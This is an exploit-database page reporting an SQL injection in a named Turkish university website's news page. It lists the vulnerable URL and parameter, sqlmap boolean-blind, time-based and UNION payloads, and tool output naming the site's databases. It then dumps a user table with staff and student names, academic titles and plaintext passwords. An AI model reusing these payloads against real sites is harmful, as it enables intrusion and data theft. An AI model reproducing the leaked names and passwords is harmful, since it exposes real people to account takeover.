Advertisement






Bayburt Üniversitesi SQL İnjection

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2020-01-22
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010172

Below is a copy:

Bayburt niversitesi SQL njection
# Exploit Title: Bayburt niversitesi SQL njection
# Date: 22.01.2020
# Exploit Author: Furkan zer
# Vendor Homepage: bumer.bayburt.edu.tr

Link##: https://bumer.bayburt.edu.tr/haber.php?id=[] sql li 

 https://bumer.bayburt.edu.tr/haber.php?id=16 

Payloads : id=16' AND 1280=1280 AND 'xtXi'='xtXi


Parameter: id (GET)                                                                                                                                                      
    Type: boolean-based blind                                                                                                                                            
    Title: AND boolean-based blind - WHERE or HAVING clause                                                                                                              
    Payload: id=16' AND 1280=1280 AND 'xtXi'='xtXi                                                                                                                       
                                                                                                                                                                         
    Type: time-based blind                                                                                                                                               
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)                                                                                                            
    Payload: id=16' AND (SELECT 6646 FROM (SELECT(SLEEP(5)))rjJt) AND 'AQkr'='AQkr                                                                                       
                                                                                                                                                                         
    Type: UNION query                                                                                                                                                    
    Title: Generic UNION query (NULL) - 7 columns                                                                                                                        
    Payload: id=16' UNION ALL SELECT NULL,CONCAT(0x7162626271,0x795147476369727a5770775858705943614948507a7547516368485175506b535873724463487263,0x716b627071),NULL,NULL,
NULL,NULL,NULL-- pPTp                                                                                                                                                    
---                                                                                                                                                                      
[19:18:07] [INFO] the back-end DBMS is MySQL                                                                                                                             
web application technology: PHP 5.6.31, Apache 2.4.27, PHP                                                                                                               
back-end DBMS: MySQL >= 5.0.12                                                                                                                                           
[19:18:07] [INFO] fetching database names                                                                                                                                
available databases [6]:                                                                                                                                                 
[*] cobozero_adsd69                                                                                                                                                      
[*] cobozero_bumer6                                                                                                                                                      
[*] information_schema                                                                                                                                                   
[*] mysql                                                                                                                                                                
[*] performance_schema                                                                                                                                                   
[*] sys                               


[162 entries]
+--------------------------------+------------------+----------------------------+--------------------------------+
| adi                            | sifre            | unvani                     | eposta                         |
+--------------------------------+------------------+----------------------------+--------------------------------+
| ?ye Deneme                    | PkNKZyz1         | ??renci                  | [email protected]            |
| Muzaffer D?LEK                | 19671967         | ??renci                  | [email protected]     |
| Emre TEKCE                     | 190612           | Yrd.Doc.Dr                 | [email protected]       |
| volkan gl                    | V273740g         | Yrd. Do. Dr.             | [email protected]       |
| Selma Birinci                  | 1q2w3e4r5t       | <blank>                    | [email protected]        |
| Recep ?ATAR                   | dmr201500        | Ara?trma Grevlisi     | [email protected]          |
| Selahattin Ko?unalp           | oRmxs9AZ         | Yardmc Doent         | [email protected]       |
| ?ZKAN BAYRAM                  | Oxu8ALWH         | Yrd. Do. Dr.             | [email protected]         |

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum